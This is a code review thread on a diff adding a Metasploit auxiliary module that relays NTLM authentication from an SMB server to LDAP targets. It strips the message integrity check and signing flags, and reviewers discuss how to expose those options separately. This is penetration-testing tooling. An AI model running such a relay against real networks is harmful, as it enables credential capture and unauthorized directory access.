modules/auxiliary/server/relay/smb_to_ldap.rb

```diff
@@ -0,0 +1,118 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::SMB::RelayServer
+  include Msf::Auxiliary::CommandShell
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Windows SMB to LDAP Relay',
+        'Description' => %q{
+          This module supports running an SMB server which validates credentials, and
+          then attempts to execute a relay attack against an LDAP server on the
+          configured RELAY_TARGETS hosts.
+
+          It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check
+          (MIC). As a result, this will only work with NTLMv1. The module takes care of
+          removing the relevant flags to bypass signing.
+
+          If the relay succeeds, an LDAP session to the target will be created. This can
+          be used by any modules that support LDAP sessions, like `admin/ldap/rbcd` or
+          `auxiliary/gather/ldap_query`.
+
+          Supports SMBv2, SMBv3, and captures NTLMv1 as well as NTLMv2 hashes.
+          SMBv1 is not supported - please see https://github.com/rapid7/metasploit-framework/issues/16261
+        },
+        'Author' => [
+          'Spencer McIntyre', # This module & LDAP relay library
+          'Christophe De La Fuente' # This module & SMB relay updates
+        ],
+        'License' => MSF_LICENSE,
+        'DefaultTarget' => 0,
+        'Actions' => [
+          [ 'CREATE_LDAP_SESSION', { 'Description' => 'Create an LDAP session' } ]
+        ],
+        'PassiveActions' => [ 'CREATE_LDAP_SESSION' ],
+        'DefaultAction' => 'CREATE_LDAP_SESSION',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS, ACCOUNT_LOCKOUTS ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(389)
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('RANDOMIZE_TARGETS', [true, 'Whether the relay targets should be randomized', true]),
+        OptInt.new('SessionKeepalive', [true, 'Time (in seconds) for sending protocol-level keepalive messages', 10 * 60])
+      ]
+    )
+
+    deregister_options('RHOSTS')
+  end
+
+  def relay_targets
+    Msf::Exploit::Remote::SMB::Relay::TargetList.new(
+      :ldap, # TODO: look into LDAPs
+      datastore['RPORT'],
+      datastore['RELAY_TARGETS'],
+      datastore['TARGETURI'],
+      randomize_targets: datastore['RANDOMIZE_TARGETS'],
+      drop_mic_and_flags: true
```

Comment:
Does it make sense to split this out so they can be controlled individually? From your research do you think that'd be helpful in the future?

e.g.
```
    drop_mic: true,
    drop_flags: true
```

If it's not dropping all of the flags, it might also make sense to clarify which flag(s) are being dropped in the option.

Reply:
Yes, absolutely, it makes sense. The only issue is that removing the flags cannot be done without dropping the MIC. This is a limitation of the `Net::NTLM` library. Once the parsed NTLM structure is serialized to obtain a binary blob, the library doesn't set the MIC back. This means, we can drop the MIC only, but we cannot remove the flags only, the MIC will always be dropped.

So, I used the following instead:
```
      drop_mic_only: true,
      drop_mic_and_sign_key_exch_flags: true
```

I believe this is the closest we can do due to this limitation.